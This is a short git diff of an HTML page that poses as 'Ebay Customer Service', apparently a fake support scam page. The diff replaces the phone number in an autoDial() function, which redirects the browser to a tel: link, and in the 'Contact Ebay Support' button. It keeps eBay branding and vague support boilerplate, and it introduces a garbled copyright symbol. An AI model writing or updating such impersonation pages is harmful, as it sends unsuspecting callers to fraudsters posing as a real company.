--- a/index.html
+++ b/index.html
@@ -55,7 +55,7 @@
   </style>
   <script>
     function autoDial() {
-      var phoneNumber = "+1-(844)-789-6622";
+      var phoneNumber = "+1-(888)-527-4650";
       window.location.href = "tel:" + phoneNumber;
     }
 
@@ -72,8 +72,8 @@
   <img src="ebaylogo.png" alt="Ebay Logo" class="Ebay-logo">
   <h1>Ebay Customer Service</h1>
   <p>For any assistance or inquiries related to Ebay products or services, our dedicated customer service team is here to help you. Whether you need technical support, have questions about your Ebay device, require assistance with your Ebay account, or need guidance with Ebay services, our experts are just a phone call away. Experience exceptional support from Ebay.</p>
-  <a href="tel:+1-(844)-789-6622" class="call-button">Contact Ebay Support</a>
-  <p class="footer">© 2023 Ebay Inc. All rights reserved.</p>
+  <a href="tel:+1-(888)-527-4650" class="call-button">Contact Ebay Support</a>
+  <p class="footer">Â© 2023 Ebay Inc. All rights reserved.</p>
 
 </body>
 
